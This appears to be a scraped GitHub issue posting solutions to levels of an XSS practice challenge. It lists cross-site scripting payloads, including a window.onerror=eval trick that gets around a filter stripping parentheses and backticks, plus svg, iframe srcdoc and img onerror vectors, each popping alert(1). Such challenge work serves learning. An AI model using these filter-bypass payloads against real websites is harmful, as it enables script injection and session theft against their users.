Open ffffff0x opened 2 years ago
过滤圆括号(,)以及反撇号`。input.replace(/[()`]/g, '') <script>window.onerror=eval;throw'=alert\x281\x29'</script <iframe srcdoc="<script>parent.alert(1)</script>"
过滤圆括号(,)以及反撇号`。input.replace(/[()`]/g, '')
(
)
`
input.replace(/[()`]/g, '')
<script>window.onerror=eval;throw'=alert\x281\x29'</script
<iframe srcdoc="<script>parent.alert(1)</script>"
<svg><script>alert(1)</script
<svg onload=alert(1)
0x05
--!><svg onload=alert(1)>
Originally posted by @iMusic in https://github.com/haozi/xss-demo/issues/1#issuecomment-287620610
0x09
https://www.segmentfault.com"></script><svg onerror=alert(1)><script>
0x0B||0x0C
<img src onerror=alert(1)>
0x04
0x05
Originally posted by @iMusic in https://github.com/haozi/xss-demo/issues/1#issuecomment-287620610
0x09
0x0B||0x0C